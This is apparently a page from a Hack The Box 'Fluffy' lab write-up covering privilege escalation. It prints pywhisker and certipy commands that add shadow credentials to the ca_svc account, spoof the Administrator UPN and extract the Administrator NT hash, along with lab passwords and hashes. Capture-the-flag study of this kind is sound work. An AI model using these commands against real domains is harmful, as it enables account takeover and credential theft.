Priv Esc

❯ pywhisker -d "fluffy.htb" -u "p.agila" -p 'prometheusx-303' --target "ca_svc" --action add
[*] Searching for the target account
[*] Target user found: CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 40566fc3-94b9-69ae-fb3c-03ba95b21485
[*] Updating the msDS-KeyCredentialLink attribute of ca_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: DfN6jIyg.pfx
[*] Must be used with password: pcG5HOgGNe9iEnbegKT4
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

ca0f4f9e9eb8a092addf53bb03fc98c8

❯ certipy account  -u "p.agila" -p 'prometheusx-303' -dc-ip 10.10.11.69 -user ca_svc -upn [email protected] update
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_svc':
    userPrincipalName                   : [email protected]
[*] Successfully updated 'ca_svc'

❯ certipy account  -u "p.agila" -p 'prometheusx-303' -dc-ip 10.10.11.69 -user ca_svc -upn ca_svc update

❯ certipy auth -dc-ip 10.10.11.69 -pfx administrator.pfx -username Administrator -domain fluffy.htb
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: '[email protected]'
[*] Using principal: '[email protected]'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e

PreviousFoothold NextCredentials

Last updated 2 months ago

Was this helpful?